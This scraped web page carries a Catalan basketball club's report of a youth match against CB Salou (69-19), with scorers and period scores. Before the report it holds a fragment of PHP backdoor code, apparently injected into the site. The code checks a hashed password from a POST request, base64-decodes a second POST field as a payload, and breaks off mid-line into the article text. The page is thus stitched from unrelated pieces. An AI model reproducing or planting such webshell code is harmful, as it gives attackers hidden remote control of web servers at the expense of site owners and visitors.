function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil masculí 07A firma un partit molt complert i derrota amb comoditat al CB Salou (69-19) - Tgn Bàsquet Club -

L’Infantil masculí 07A firma un partit molt complert i derrota amb comoditat al CB Salou (69-19)

Updated: maig 12, 2021

L’equip Infantil masculí 07A compleix amb els objectius plantejats i es mostra, durant els 40 minuts, superior al CB Salou. Durant el primer període els tarragonins van sortir marcant el seu propi ritme de joc, que seguiria constant fins al xiulet final. La intensitat defensiva va permetre recuperar moltes possessions, que els locals van aprofitar per a poder anotar en superioritats, arribant al descans amb un marcador gairebé decisiu (46-13). Tot i que al final del partit els percentatges d’encert en atac no van estar a l’altura dels inicials, es va seguir treballant la rotació de pilota i les posicions defensives, per a culminar el matx en victòria.

TGN BÀSQUET 07 A 69

CB SALOU 19

TGN BÀSQUET 69: Gomà (12), Macià (5), Floresví (8), Carrasco (10), Aledo (9) -cinc inicial- Souto (8), P. Barrufet, Poveda (9), R. Barrufet. (8). 3 Triples: Aledo, Poveda i Gomà. 4/13 Tirs lliures. 8 faltes.

CB SALOU 19: Valle, Capilla, Chalare (6), Siquiera (4), Marcos -cinc inicial- Sánchez (1), Secada (6), Santos (2), Muñoz, Adrazubi. 1/2 tirs lliures. 11 faltes. Eliminat: Siquiera

PARCIALS: 27-5, 19-8, 14-4 i 9-2.

ÀRBITRES:  Prats.